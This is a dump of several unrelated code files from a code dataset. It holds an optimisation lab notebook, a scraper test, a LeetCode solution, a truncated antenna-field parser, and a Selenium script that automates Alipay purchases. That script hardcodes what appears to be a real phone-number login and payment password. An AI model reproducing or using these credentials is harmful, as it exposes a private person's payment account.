descent')\nplt.legend()\nplt.show()\n\n\n# Из данного графика мы видим, что наискорейший спуск сходится значительно быстрее.\n\n# Если у нас есть какие-то признаки, которые встречаются достаточно редко, то соответствующий столбец будет разреженным.\n# \n# **Задание**\n# В чем заключается проблема?\n# \n# Так как в данном столбце будут преобладать нули, то градиент по соответствующей переменной на фоне остальных будет довольно мал, что означает в случае малой скорости обучения потенциально очень низкую скорость схождения ответа к оптимальному по данной переменной, а в случае большой - шанс расхождения по неразреженным столбцам. 
Более того, данные признаки могут быть значимыми при классификации, но из-за разреженности столбцов учитываться будут мало.\n\n# **Стохастический градиентный спуск**\n\n# In[17]:\n\ndef logistic_loss(w, x, y):\n return (1 / x.shape[0]) * sum(np.logaddexp(0, -y[i] * np.dot(x[i], w)) for i in range(x.shape[0]))\n\n\ndef logistic_grad(w, x, y):\n v = np.empty((x.shape[0], x.shape[1]))\n for i in range(x.shape[0]):\n val = -y[i] * np.dot(x[i], w)\n if np.abs(val) > 1000: # overflow protection\n if val > 0:\n v[i] = -y[i] * x[i]\n else:\n v[i] = 0\n else:\n v[i] = -y[i] * x[i] * (math.exp(val) / (1 + math.exp(val)))\n return (1 / x.shape[0]) * np.sum(v, axis=0)\n\n\n# In[18]:\n\ndef sgd(x0, x, y, func, grad, learn_rate, pass_num, batch_size=1):\n batch_num = x.shape[0] // batch_size\n costs = np.empty(pass_num * batch_num)\n steps = np.empty((pass_num * batch_num, x0.shape[0]))\n for p in range(pass_num):\n for j in range(batch_num):\n x_new = x[j * batch_size:(j + 1) * batch_size]\n y_new = y[j * batch_size:(j + 1) * batch_size]\n costs[p * batch_num + j] = func(x0, x_new, y_new)\n steps[p * batch_num + j] = x0\n x0 -= learn_rate * grad(x0, x_new, y_new)\n return x0, costs, steps\n\n\n# In[19]:\n\ntrain = np.loadtxt('train.csv', skiprows=1, delimiter=',')\nones = train[train[:, 0] == 1]\nzeroes = train[train[:, 0] == 0]\no_tr, o_test = np.split(ones, 2) # training set is equal in size to test set\nz_tr, z_test = np.split(zeroes, 2)\nz_tr[:, 0] = 1 # we need first feature column to contain 1 in order for prediction to be fully vectorized;\n# since b_size contains labels (0) in the original dataset, we can easily overwrite b_size after\n# extracting labels\ntrainset = np.concatenate((o_tr, z_tr))\ntestset = np.concatenate((o_test, z_test))\nlabels = np.r_[np.ones(o_tr.shape[0]), -np.ones(z_tr.shape[0])].reshape(o_tr.shape[0] + z_tr.shape[0], 1)\ntestset_labels = list(map(lambda x: 1 if x == 1 else -1, testset[:, 0])) # manually construct labels: 1 for 1, -1 for 0\ntestset[:, 0] = 1\n\n# In[20]:\n\nstart = np.zeros((train.shape[1]))\nsol = sgd(start, trainset, labels, logistic_loss, logistic_grad, 1e-6, 10, 4000)\n\n\n# In[21]:\n\ndef calculate_acc(w, test_features, test_labels):\n # 1st return value is number of wrong predictions, 2nd is accuracy (correct guesses/number of items in test set\n wrong = sum(np.sign(test_features[i].dot(w)) != test_labels[i] for i in range(test_features.shape[0]))\n return wrong, 1 - wrong / testset.shape[0]\n\n\n# In[22]:\n\ncalculate_acc(sol[0], testset, testset_labels)\n\n# In[23]:\n\nsetup_plot_figure('Batch size', 'Accuracy')\nfor b_size in range(10, trainset.shape[0], 25):\n plt.plot(b_size,\n calculate_acc(sgd(start, trainset, labels, logistic_loss, logistic_grad, 1e-6, 1, b_size)[0], testset,\n testset_labels)[1], 'bo')\nplt.show()\n\n# Заметим, что размер батчей не влияет на качество классификации заметным образом за исключением случая, когда выборка делится на два батча только с нулями и единицами (размер каждого - примерно 2000)\n\n# In[24]:\n\nsetup_plot_figure('Batch size', 'Loss')\nplt.plot(sgd(start, trainset, labels, logistic_loss, logistic_grad, 1e-6, 400, 400)[1], color='green', label='400')\nplt.plot(sgd(start, trainset, labels, logistic_loss, logistic_grad, 1e-6, 10, 10)[1], color='red', label='10')\nplt.plot(sgd(start, trainset, labels, logistic_loss, logistic_grad, 1e-6, 1)[1], color='blue', label='1')\nplt.legend(title='Batch elements')\nplt.show()\n\n\n# Такое число проходов для каждого размера батча мы ставим, чтобы в каждом случае алгоритм 
проработал одно и то же число итераций.\n# Можно заметить, что после ~4000 итерации графики функций (даже стохастического спуска) относительно стабилизируются, что может значить, что более 1 прохода даже в худшем случае по выборке делать смысла не так много.\n\n# **Экспоненциальное сглаживание**\n\n# In[25]:\n\ndef sgd_smooth(x0, x, y, func, grad, learn_rate, pass_num, batch_size=1, gamma=0):\n batch_num = x.shape[0] // batch_size\n costs = np.empty(pass_num * batch_num)\n steps = np.empty((pass_num * batch_num, x0.shape[0]))\n for p in range(pass_num):\n for j in range(batch_num):\n x_new = x[j * batch_size:(j + 1) * batch_size]\n y_new = y[j * batch_size:(j + 1) * batch_size]\n if p != 0 or j != 0:\n costs[p * batch_num + j] = gamma * costs[p * batch_num + j - 1] + (1 - gamma) * func(x0, x_new, y_new)\n else:\n costs[p * batch_num + j] = func(x0, x_new, y_new)\n steps[p * batch_num + j, :] = x0\n x0 -= learn_rate * grad(x0, x_new, y_new)\n return x0, costs, steps\n\n\n# In[26]:\n\nsetup_plot_figure('Iteration', 'Loss')\nplt.plot(sgd_smooth(start, trainset, labels, logistic_loss, logistic_grad, 1e-7, 100, 100, 1)[1], color='green',\n alpha=0.5)\nplt.plot(sgd_smooth(start, trainset, labels, logistic_loss, logistic_grad, 1e-7, 100, 100, 0.75)[1], color='red',\n alpha=0.5)\nplt.plot(sgd_smooth(start, trainset, labels, logistic_loss, logistic_grad, 1e-7, 100, 100, 0.25)[1], color='black',\n alpha=0.5)\nplt.plot(sgd_smooth(start, trainset, labels, logistic_loss, logistic_grad, 1e-7, 100, 100)[1], color='blue', alpha=0.5)\nplt.show()\n\n\n# Заметим, что в случае $\\gamma=1$ функция ошибки вырождается в константное значение на первом батче первого прохода, в случае $\\gamma=0$ - в функцию ошибки без сглаживания. Также можно рассмотреть конкретные $Q^k$ и $Q(x_{k+1})$, тогда после несложных преобразований получаем, что $Q^{k+1}$ - линейная функция от $\\gamma$, пересекающая ось ординат в точке $Q(x_{k+1})$. Таким образом, $\\gamma$ влияет на график функции ошибки следующим образом: последующие значение начинают \"учитывать\" предыдущие, таким образом, как и следует из названия, сглаживаются скачки функции ошибки при обработке стоящих друг за другом батчей. Наиболее подходящий способ вычисления $Q$ зависит от задачи: сглаживание может не всегда удовлетворять нашим нуждам (например, мы хотим с какой-то целью анализировать скачки в неизменном виде). 
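The smoothing rule in sgd_smooth above is a plain exponential moving average, Q_k = gamma * Q_{k-1} + (1 - gamma) * q_k; on an alternating series the damping is easy to see:

gamma, ema = 0.75, None
for q in (1.0, 5.0, 1.0, 5.0):
    ema = q if ema is None else gamma * ema + (1 - gamma) * q
    print(ema)   # 1.0, 2.0, 1.75, 2.5625 -- the 1 <-> 5 jumps are damped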
\n\n# **Сохранение импульса**\n\n# In[27]:\n\ndef grad_descent_momentum(x0, func, grad, learn_rate, iter_num, gamma=0):\n steps = np.empty((iter_num, x0.shape[0]))\n costs = np.empty(iter_num)\n momentum = np.zeros(x0.shape[0])\n for i in range(iter_num):\n costs[i] = func(x0)\n momentum = gamma * momentum + learn_rate * grad(x0)\n x0 -= momentum\n steps[i] = x0\n return x0, costs, steps\n\n\n# In[28]:\n\ndef simple1_func(x): # z=10x^2+y^2\n return 10 * x[0] ** 2 + x[1] ** 2\n\n\ndef simple1_grad(x):\n return np.array([20 * x[0], 2 * x[1]])\n\n\nxx = np.arange(-10, 10, 0.01)\nyy = np.arange(-10, 10, 0.01)\nxgrid, ygrid = np.meshgrid(xx, yy)\nzgrid = simple1_func((xgrid, ygrid))\nsetup_plot_figure()\ncont = plt.contour(xgrid, ygrid, zgrid)\ncont.clabel(fmt=\"%.0f\")\n\nstart_simple_1 = np.random.randn(2) * 10\nres_without_momentum = grad_descent_momentum(start_simple_1, simple1_func, simple1_grad, 1e-2, 50)\nplt.plot(res_without_momentum[2].T[0], res_without_momentum[2].T[1], 'bo', label='$\\gamma=0$ (regular GD)')\nres_with_momentum1 = grad_descent_momentum(start_simple_1, simple1_func, simple1_grad, 1e-2, 50, 0.25)\nplt.plot(res_with_momentum1[2].T[0], res_with_momentum1[2].T[1], 'ro', label='$\\gamma=0.25$')\nres_with_momentum2 = grad_descent_momentum(start_simple_1, simple1_func, simple1_grad, 1e-2, 50, 0.5)\nplt.plot(res_with_momentum2[2].T[0], res_with_momentum2[2].T[1], 'yo', label='$\\gamma=0.5$')\nres_with_momentum3 = grad_descent_momentum(start_simple_1, simple1_func, simple1_grad, 1e-2, 50, 0.75)\nplt.plot(res_with_momentum3[2].T[0], res_with_momentum3[2].T[1], 'go', label='$\\gamma=0.75$')\nplt.legend()\nplt.show()\n\n# In[29]:\n\nsetup_plot_figure('Iteration', 'Loss')\nplt.plot(res_without_momentum[1], label='$\\gamma=0$ (regular GD)')\nplt.plot(res_with_momentum1[1], label='$\\gamma=0.25$')\nplt.plot(res_with_momentum2[1], label='$\\gamma=0.5$')\nplt.plot(res_with_momentum3[1], label='$\\gamma=0.75$')\nplt.ylim(0, 10)\nplt.legend()\nplt.show()\n\n\n# Легко заметить, что повышение коэффициента на текущих данных и при фиксированных остальных параметрах даёт повышение скорости сходимости. 
Были рассмотрены 4 варианта $\\gamma$, отстоящие от соседей на равных расстояниях, чтобы продемонстрировать динамику изменений графика в зависимости от данного параметра.\n\n# **Ускоренный градиент Нестерова**\n\n# In[30]:\n\ndef grad_descent_nesterov(x0, func, grad, learn_rate, iter_num, gamma=0):\n steps = np.empty((iter_num, x0.shape[0]))\n costs = np.empty(iter_num)\n momentum = np.zeros(x0.shape[0])\n for i in range(iter_num):\n costs[i] = func(x0)\n momentum = gamma * momentum + learn_rate * grad(x0 - momentum)\n x0 -= momentum\n steps[i] = x0\n return x0, costs, steps\n\n\n# In[31]:\n\nstart_m = np.random.randn(2) * 10\nres_imp = grad_descent_momentum(start_m, rosenbrock, rosenbrock_grad, 1e-5, 100, 0.8)\nres_nes = grad_descent_nesterov(start_m, rosenbrock, rosenbrock_grad, 1e-5, 100, 0.8)\nsetup_plot_figure('Iteration', 'Loss')\nplt.plot(res_imp[1], label='Momentum')\nplt.plot(res_nes[1], label='Nesterov\\'s accelerated gradient')\nplt.title('Performance of two gradient descent improvements on Rosenbrock function')\nplt.legend()\nplt.show()\n\n# In[32]:\n\nxx = np.arange(-20, 20, 0.1)\nyy = np.arange(-20, 20, 0.1)\nxgrid, ygrid = np.meshgrid(xx, yy)\nzgrid = rosenbrock((xgrid, ygrid))\nfig = setup_plot_figure()\nax = fig.gca(projection='3d')\ncont = ax.plot_surface(xgrid, ygrid, zgrid, norm=matplotlib.colors.LogNorm(), cmap=plt.cm.jet, linewidth=0, shade=False)\nfig.colorbar(cont, shrink=0.5, aspect=5)\nax.plot(xs=res_imp[2].T[0], ys=res_imp[2].T[1], zs=rosenbrock(res_imp[2].T), label='Momentum')\nax.plot(xs=res_nes[2].T[0], ys=res_nes[2].T[1], zs=rosenbrock(res_nes[2].T), label='Nesterov\\'s accelerated gradient')\nplt.legend()\nfig.show()\n\n\n# **Adagrad (2011)**\n\n# In[33]:\n\ndef adagrad(x0, func, grad, learn_rate, iter_num):\n costs = np.empty(iter_num)\n steps = np.empty((iter_num, x0.shape[0]))\n eps = 0.01\n g = np.zeros((x0.shape[0], x0.shape[0]))\n for i in range(iter_num):\n costs[i] = func(x0)\n steps[i] = x0\n gr = grad(x0)\n g += np.dot(gr.T, gr)\n x0 -= learn_rate * gr / (np.sqrt(np.diag(g)) + eps)\n return x0, costs, steps\n\n\n# In[34]:\n\nsol_sgd = sgd(start, trainset, labels, logistic_loss, logistic_grad, 1e-6, 1, 10)\nsol_adagrad = adagrad(start, lambda w: logistic_loss(w, trainset, labels), lambda w: logistic_grad(w, trainset, labels),\n 1e-6, 440)\nsetup_plot_figure('Iteration', 'Loss')\nplt.plot(sol_sgd[1], label='SGD')\nplt.plot(sol_adagrad[1], label='Adagrad')\nplt.legend()\nplt.title('Convergence on MNIST dataset for logistic loss function')\nplt.show()\n\n\n# **RMSprop**\n\n# In[35]:\n\ndef rmsprop(x0, func, grad, learn_rate, iter_num, gamma=1):\n costs = np.empty(iter_num)\n steps = np.empty((iter_num, x0.shape[0]))\n eps = 0.01\n g = np.zeros((x0.shape[0], x0.shape[0]))\n for i in range(iter_num):\n costs[i] = func(x0)\n steps[i] = x0\n gr = grad(x0)\n g = gamma * g + (1 - gamma) * np.dot(gr.T, gr)\n x0 -= learn_rate * gr / (np.sqrt(np.diag(g)) + eps)\n return x0, costs, steps\n\n\n# **Adadelta (2012)**\n# 1. В [статье](https://arxiv.org/pdf/1212.5701v1.pdf) главным преимуществом данного метода над обычным Adagrad называется целиком адаптивная скорость обучения (не нужно подбирать стартовый параметр) и избавление от проблемы уменьшения шага градиента при большом числе итераций (в матрице $G$ значения монотонно возрастают, так как добавляются квадраты компонент градиентов). 
Теперь дробь, определяющяя коэффициент перед градиентом для каждого шага, определяется следующим образом: $$\\frac{RMS[\\Delta w]_{t-1}}{RMS[g]_t}$$ $RMS[a]=\\sqrt{E[a^2]+\\varepsilon}$, $E[a^2]_t=\\gamma E[a^2]_{t-1}+(1-\\gamma)a_t^2$. Таким образом, мы подсчитываем на каждой итерации \"средние квадратические\" для градиентов и шагов, а затем на основании полученных результатов вычисляем новый шаг.\n# 2. Выражение в знаменателе аналогично RMSprop, таким образом, всё, сказанное для него, остаётся истинным. Выражение в числителе добавляется для соответствия гипотетических \"единиц измерения\" $w$ и $\\Delta w$ (по аналогии с методом Ньютона рассматриваем диагональ гессиана, чтобы размерности в итоговом выражении сошлись).\n\n# In[36]:\n\ndef adadelta(x0, func, grad, iter_num, gamma=1):\n costs = np.empty(iter_num)\n steps = np.empty((iter_num, x0.shape[0]))\n eps = 0.01\n dx = np.zeros((x0.shape[0], x0.shape[0]))\n g = np.zeros((x0.shape[0], x0.shape[0]))\n for i in range(iter_num):\n costs[i] = func(x0)\n steps[i] = x0\n gr = grad(x0)\n g = gamma * g + (1 - gamma) * np.dot(gr.T, gr)\n update = (np.sqrt(np.diag(dx)) + eps) * gr / (np.sqrt(np.diag(g)) + eps)\n dx = gamma * dx + (1 - gamma) * np.dot(update.T, update)\n x0 -= update\n return x0, costs, steps\n\n\n# **Adam (2015)**\n\n# In[37]:\n\ndef adam(x0, func, grad, learn_rate, iter_num, gamma=1):\n costs = np.empty(iter_num)\n steps = np.empty((iter_num, x0.shape[0]))\n eps = 0.01\n g = np.zeros((x0.shape[0], x0.shape[0]))\n momentum = np.zeros((x0.shape[0]))\n for i in range(iter_num):\n costs[i] = func(x0)\n steps[i] = x0\n gr = grad(x0)\n g = gamma * g + (1 - gamma) * np.dot(gr.T, gr)\n momentum = gamma * momentum + learn_rate * gr / (np.sqrt(np.diag(g)) + eps)\n x0 -= momentum\n return x0, costs, steps\n\n\n# In[38]:\n\nsol_rmsprop = rmsprop(start, lambda w: logistic_loss(w, trainset, labels), lambda w: logistic_grad(w, trainset, labels),\n 1e-6, 440, 0.5)\nsol_adadelta = adadelta(start, lambda w: logistic_loss(w, trainset, labels),\n lambda w: logistic_grad(w, trainset, labels), 440, 0.5)\nsol_adam = adam(start, lambda w: logistic_loss(w, trainset, labels), lambda w: logistic_grad(w, trainset, labels), 1e-6,\n 440, 0.5)\n\nsetup_plot_figure('Iteration', 'Loss')\nplt.plot(sol_adagrad[1], label='Adagrad')\nplt.plot(sol_rmsprop[1], label='RMSprop')\nplt.plot(sol_adadelta[1], label='Adadelta')\nplt.plot(sol_adam[1], label='Adam')\nplt.legend()\nplt.title('Convergence on MNIST dataset for logistic loss function')\nplt.show()\n\n# Можно заметить, что скорость сходимости Adam по сравнению с методом сохранения импульса и RMSprop действительно повысилась, что можно обосновать тем, что алгоритм комбинирует в себе лучшее от двух неконфликтующих оптимизаций.\n\n# **Задание**\n# 1. Предложите некоторую функцию, которая наглядно показывает отличие в работе всех предложенных методов.\n# 2. 
Сделайте анимацию, которая пошагово отрисовывает треки все спусков.\n\n# В качестве функции-бенчмарка можно рассмотреть уже знакомую функцию Розенброка, так как её свойства позволят нам легко сравнить сходимости (в частности, в \"долине\").\n\n# In[52]:\n\nbench_start = np.random.randn(2) * 10\nlr = 1e-7\niters = 50\nbench_basic = grad_descent(bench_start, rosenbrock, rosenbrock_grad, lr, iters)[2]\nbench_accel = grad_descent_accel(bench_start, rosenbrock, rosenbrock_grad, iters)[2]\nbench_momentum = grad_descent_momentum(bench_start, rosenbrock, rosenbrock_grad, lr, iters, 0.5)[2]\nbench_nesterov = grad_descent_nesterov(bench_start, rosenbrock, rosenbrock_grad, lr, iters, 0.5)[2]\nbench_adagrad = adagrad(bench_start, rosenbrock, rosenbrock_grad, lr, iters)[2]\nbench_rmsprop = rmsprop(bench_start, rosenbrock, rosenbrock_grad, lr, iters)[2]\nbench_adadelta = adadelta(bench_start, rosenbrock, rosenbrock_grad, iters)[2]\nbench_adam = adam(bench_start, rosenbrock, rosenbrock_grad, lr, iters)[2]\nxx = np.arange(-20, 20, 0.01)\nyy = np.arange(-20, 20, 0.01)\nxgrid, ygrid = np.meshgrid(xx, yy)\nzgrid = rosenbrock((xgrid, ygrid))\nsetup_plot_figure(hline=True, vline=True)\ncont = plt.contourf(xgrid, ygrid, zgrid, 1000, cmap=plt.cm.jet)\nplt.xlim(-20, 20)\nplt.ylim(-15, 15)\nplt.plot(bench_basic.T[0], bench_basic.T[1], 'bo', alpha=0.5, label='Basic')\nplt.plot(bench_accel.T[0], bench_accel.T[1], 'ro', alpha=0.5, label='Accelerated')\nplt.plot(bench_momentum.T[0], bench_momentum.T[1], 'go', alpha=0.5, label='Momentum')\nplt.plot(bench_nesterov.T[0], bench_nesterov.T[1], 'co', alpha=0.5, label='Nesterov')\nplt.plot(bench_adagrad.T[0], bench_adagrad.T[1], 'mo', alpha=0.5, label='Adagrad')\nplt.plot(bench_rmsprop.T[0], bench_rmsprop.T[1], 'yo', alpha=0.5, label='RMSprop')\nplt.plot(bench_adadelta.T[0], bench_adadelta.T[1], 'wo', alpha=0.5, label='Adadelta')\nplt.plot(bench_adam.T[0], bench_adam.T[1], 'ko', alpha=0.5, label='Adam')\nplt.legend()\nplt.show()\n","sub_path":"labs/L1 - Gradient descent and linear models.py","file_name":"L1 - Gradient descent and linear models.py","file_ext":"py","file_size_in_byte":32558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"194937702","text":"import pytest\n\nfrom trading_bot.sources import SmartLab\n\npytestmark = pytest.mark.asyncio\n\n\nasync def test_local_generator():\n sl = SmartLab()\n with open(\"html/test_smartLab.html\", 'r', encoding=\"utf8\") as html_page:\n text = html_page.read()\n sl.update_cache(\"https://smart-lab.ru\", text)\n\n page = await sl.check_update()\n res = (\"+320 (283) [Ситуация на текущий момент](https://clck.ru/EZwKc)\\n\"\n \"\\n\"\n \"+223 (97) [Мост на Сахалин](https://clck.ru/EZwKd)\\n\"\n \"\\n\"\n \"+186 (22) [Три стадии бедности](https://clck.ru/EZwKe)\\n\"\n \"\\n\"\n \"+157 (67) [Какой мост нужен на Сахалин?](https://clck.ru/EZwKf)\\n\"\n \"\\n\"\n \"+150 (27) [Про деньги](https://clck.ru/EZwKg)\\n\"\n \"\\n\"\n \"+150 (23) [Размещение ОФЗ + RGBI + Объём ОФЗ](https://clck.ru/EZwKh)\\n\"\n \"\\n\"\n \"+136 (23) [\\\"Утренний звонок\\\". Биржевой рассказ. Пролог.](https://clck.ru/EZwKj)\\n\"\n \"\\n\"\n \"+115 (32) [Запасы нефти в США: -6,1 мб, добыча: +0 тб/д](https://clck.ru/EZwKk)\\n\"\n \"\\n\"\n \"+104 (61) [Рассказ о моей торговле](https://clck.ru/EZwKn)\\n\"\n \"\\n\"\n \"+101 (0) [Рубль: usdrub - все пристегнулись? ... 
в 100тыс500 раз?!](https://clck.ru/EZwKo)\")\n\n    assert len(page.posts) == 1\n    assert page.posts[0].md == res\n","sub_path":"tests/test_smartLab.py","file_name":"test_smartLab.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"337790516","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n'''\nThe three Python packages for working with Excel are listed below; note that they only handle .xls, not .xlsx.\nxlrd: read operations on Excel files\nxlwt: write operations on Excel files\nxlutils: glue combining xlrd/xlwt for read-write round trips\n'''\nimport xlrd\nfrom xlutils import copy\nfrom selenium import webdriver\nimport time\n\nGOODS_URL = 'https://www.qianquwan.com/tuan/show_16.html'\nUSER_AGENT = \"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50\"\nGOODS_URL4 = 'https://www.qianquwan.com/tuan/show_16.html'  # desktop version of the page\nGOODS_URL5 = 'https://www.qianquwan.com/phone/tuan/show_16.html'  # mobile version of the page\n\nncols = [1,3,10]\ni=0  # global count of rows already read\npath = r'test.xlsx'\nworkbook = xlrd.open_workbook(path)\nnrows_num =workbook.sheet_by_index(0).nrows  # first sheet's row count\n\n# read one customer's data from the spreadsheet\ndef read_all(path):\n    global i\n    i += 1\n    workbook = xlrd.open_workbook(path)\n    sheet_name = workbook.sheet_by_index(0)  # get the first sheet\n    nrows = list(range(0,sheet_name.nrows))  # row index list\n    print(nrows)\n    customer_name = sheet_name.cell(nrows[i], ncols[0]).value\n    customer_phone_number = int(sheet_name.cell(nrows[i],ncols[1]).value)\n    customer_order_number = int(sheet_name.cell(nrows[i], ncols[2]).value)\n\n    print(i)\n    return customer_name,customer_phone_number,customer_order_number\n\ndef successful_write(nows):\n    rb = xlrd.open_workbook(path)\n    wb = copy.copy(rb)\n    # get a writable sheet object; sheets returned by sheet_by_index() have no write() method\n    ws = wb.get_sheet(0)\n    print(ws)\n    # write the status\n    ws.write(nows, 17, 'order placed successfully')\n    wb.save(path)\n\ndef fail_write(nows):\n    rb = xlrd.open_workbook(path)\n    wb = copy.copy(rb)\n    # get a writable sheet object; sheets returned by sheet_by_index() have no write() method\n    ws = wb.get_sheet(0)\n    print(ws)\n    # write the status\n    ws.write(nows, 17, 'order failed')\n    wb.save(path)\n\ndef auto_buy():\n    # open the first purchase page\n    driver = webdriver.Firefox()\n    driver.get(GOODS_URL5)\n    time.sleep(2)\n    driver.find_element_by_link_text('立即抢购').click()  # link text on the target page (\"buy now\")\n    time.sleep(5)\n\n    # go to the second page and fill in the buyer's information\n    customer_name,customer_phone_number,customer_order_number=read_all(path)\n    for k in range(1,customer_order_number):\n        print(k)\n        driver.find_element_by_xpath('//a[@class=\"add-btn\"]').click()\n    print(customer_order_number)\n    driver.find_element_by_name('linkman').send_keys(customer_name)\n    print(customer_name)\n    driver.find_element_by_name('linktel').send_keys(customer_phone_number)\n    print(customer_phone_number)\n    try:\n        driver.find_element_by_name('checkcode').send_keys(input('code'))\n    except:\n        print('captcha field not found on the desktop page')\n    try:\n        driver.find_elements_by_class_name('tj-btn')[0].click()\n    except:\n        print('buy button not found on the desktop page')\n    try:\n        driver.find_elements_by_class_name('now-booking-btn')[0].click()\n    except:\n        print('buy button not found on the mobile page')\n    time.sleep(1)\n\n    # third page: choose the payment method\n    try:\n        driver.find_element_by_xpath('//li[@data=\"11\"]').click()\n        driver.find_element_by_id('st-payment-submit').click()\n    except :\n        print('could not match the payment option')\n\n    # wait for the fourth page (payment) to load\n    time.sleep(8)\n    driver.switch_to.window(driver.window_handles[1])\n    driver.switch_to.window(driver.window_handles[1])\n\n    try:\n        driver.find_element_by_name('loginId').send_keys('18940046576')\n    except:\n        print('could not enter the username')\n    try:\n        driver.find_element_by_id('payPasswd_rsainput').send_keys('199411')\n    except:\n        print('could not enter the password')\n    try:\n        
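successful_write() and fail_write() above rely on the standard xlrd -> xlutils -> xlwt round trip, since xlrd sheets are read-only. Reduced to a sketch, with 'demo.xls' as a placeholder path (these packages handle .xls, not .xlsx):

import xlrd
from xlutils.copy import copy as make_writable

rb = xlrd.open_workbook('demo.xls')      # read-only workbook
wb = make_writable(rb)                   # writable xlwt copy of it
wb.get_sheet(0).write(0, 17, 'status')   # row 0, column 17
wb.save('demo.xls')                      # write the modified copy back out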
driver.find_element_by_xpath('//a[@data-defaulttext=\"下一步\"]').click()  # the \"next step\" button\n        # driver.find_element_by_class_name('newBtn-blue newBtn-long').click()\n    except:\n        print('could not submit the Alipay order')\n    time.sleep(2)\n    j=1\n    while True:\n        j+=1\n        try:\n            driver.find_element_by_id('payPasswd_rsainput').send_keys('199411')\n        except:\n            print('could not enter the password')\n        # try:\n        #     checkCode = driver.find_element_by_name('checkCode').send_keys('yuan')  # type a guess for the captcha\n        #     driver.find_element_by_xpath('//a[@data-defaulttext=\"下一步\"]').click()\n        # except:\n        #     print(\"driver.find_element_by_name('checkCode')\")\n        try:\n            checkCode= driver.find_element_by_xpath('//input[@name=\"checkCode\"]')\n            checkCode.send_keys(input('enter captcha 3'))\n            driver.find_element_by_xpath('//a[@data-defaulttext=\"下一步\"]').click()\n            break\n        except:\n            print(\"driver.find_element_by_xpath('//input[@name='checkCode']')\")\n        if j>5:\n            break\n\n    time.sleep(5)\n    try:\n        driver.find_element_by_class_name('sixDigitPassword').send_keys('199411')\n    except:\n        print(input('enter password >>>:'))\n    try:\n        driver.find_element_by_id('J_authSubmit').click()\n        print('successful')\n        successful_write(i)\n    except:\n        fail_write(i)\n    driver.quit()\n\n\n\nif __name__=='__main__':\n    for num in range(1, nrows_num):\n        auto_buy()\n\n\n","sub_path":"auto_buy.py","file_name":"auto_buy.py","file_ext":"py","file_size_in_byte":5367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"327733353","text":"\"\"\"\nGiven a file's absolute path in Unix style, simplify it; in other words, convert it to the canonical path.\n\nIn a Unix-style file system, a single dot (.) refers to the current directory itself; two dots (..) switch the directory one level up (pointing to the parent directory); both can be components of a complex relative path. For more information, see: absolute path vs. relative path in Linux / Unix.\n\nNote that the returned canonical path must always begin with a slash /, and there must be exactly one slash / between two directory names. The last directory name (if present) must not end with a /. Moreover, the canonical path must be the shortest string representing the absolute path.\n\n \n\nExample 1:\n\nInput: \"/home/\"\nOutput: \"/home\"\nExplanation: note that there is no slash after the last directory name.\nExample 2:\n\nInput: \"/../\"\nOutput: \"/\"\nExplanation: going up one level from the root directory is not possible, since the root is the highest level reachable.\nExample 3:\n\nInput: \"/home//foo/\"\nOutput: \"/home/foo\"\nExplanation: in the canonical path, multiple consecutive slashes must be replaced by a single slash.\nExample 4:\n\nInput: \"/a/./b/../../c/\"\nOutput: \"/c\"\nExample 5:\n\nInput: \"/a/../../b/../c//.//\"\nOutput: \"/c\"\nExample 6:\n\nInput: \"/a//b////c/d//././/..\"\nOutput: \"/a/b/c\"\nAccepted 57,980 times; submitted 141,935 times.\n\nSource: LeetCode (力扣)\nLink: https://leetcode-cn.com/problems/simplify-path\nCopyright belongs to LeetCode; for commercial reprints contact them for official authorization, and credit the source for non-commercial reprints.\n\"\"\"\n\ndef simplifyPath(path: str) -> str:\n    paths = path.split('/')\n    paths = list(filter(lambda x: x != '' and x != '.', paths))\n    i, stack = 0, []\n    while i < len(paths):\n        cur = paths[i]\n        if cur == '..' 
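# A worked trace of the stack algorithm implemented here, keyed to Example 4
# of the problem statement: for "/a/./b/../../c/" the non-empty, non-'.'
# segments are ['a', 'b', '..', '..', 'c'], and the stack evolves
# ['a'] -> ['a', 'b'] -> ['a'] -> [] -> ['c'], giving "/c".
# Note that '..' seen on an empty stack is pushed (the else branch below) and
# only stripped afterwards by the `start` loop, so "/../" still yields "/".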
and len(stack) > 0:\n            stack.pop()\n        else:\n            stack.append(cur)\n        i += 1\n\n    start = 0\n    while start < len(stack) and stack[start] == '..':\n        start += 1\n\n    return '/' + '/'.join(stack[start:])\n\n\nif __name__ == '__main__':\n    print(simplifyPath(\"/home/../..\"))\n","sub_path":"71_simplifyPath.py","file_name":"71_simplifyPath.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"650170651","text":"#!/usr/bin/env python\n\"\"\"A module to read LOFAR antenna field files.\nThe ROTATION_MATRIX field is the rotation matrix of the station;\nit maps the local station coordinates to the ITRF coordinates\nsuch that\n\n    r_ITRF = ROTATION_MATRIX * r_stn where r are 3-element column vectors.\n\"\"\"\n\nimport sys\nimport numpy as np\nimport os\nfrom os.path import dirname\nimport argparse\n\n__version__ = 0.1\nSTATICMETADATA = os.path.join(dirname(__file__),'share/StaticMetaData/')\nANTENNAFIELDDIR = STATICMETADATA\nIHBADELTASDIR = os.path.join(dirname(__file__),'share/iHBADeltas/')\nIHBADELTASDIR = STATICMETADATA\nCOMMENT_CHAR = '#'\nAFfileNameType = 3\n\n\ndef _getAntennaFieldFile(stationName):\n    antenna_field_dir = ANTENNAFIELDDIR\n    if AFfileNameType==2 or AFfileNameType==3:\n        basename = stationName+'-'+'AntennaField'+'.conf'\n    else:\n        basename='AntennaField'+stationName+'.conf'\n    filepath = os.path.join(antenna_field_dir, basename)\n    return filepath\n\n\ndef _getiHBADeltafile(stationName):\n    \"\"\"Get file path to iHBADelta for given stationName. \"\"\"\n    basename = stationName+'-'+'iHBADeltas'+'.conf'\n    filepath = os.path.join(IHBADELTASDIR, basename)\n    return filepath\n\n\ndef parseAntennaField(stationName):\n    filepath = _getAntennaFieldFile(stationName)\n    return parseAntennaFieldFile(filepath)\n\n\ndef parseAntennaFieldFile(filename, AFfileNameType=3):\n    \"\"\"Parse LOFAR AntennaField file by name and return data as a dict.\n    Note that this reads in both LBA and HBA parameters.\n    \"\"\"\n    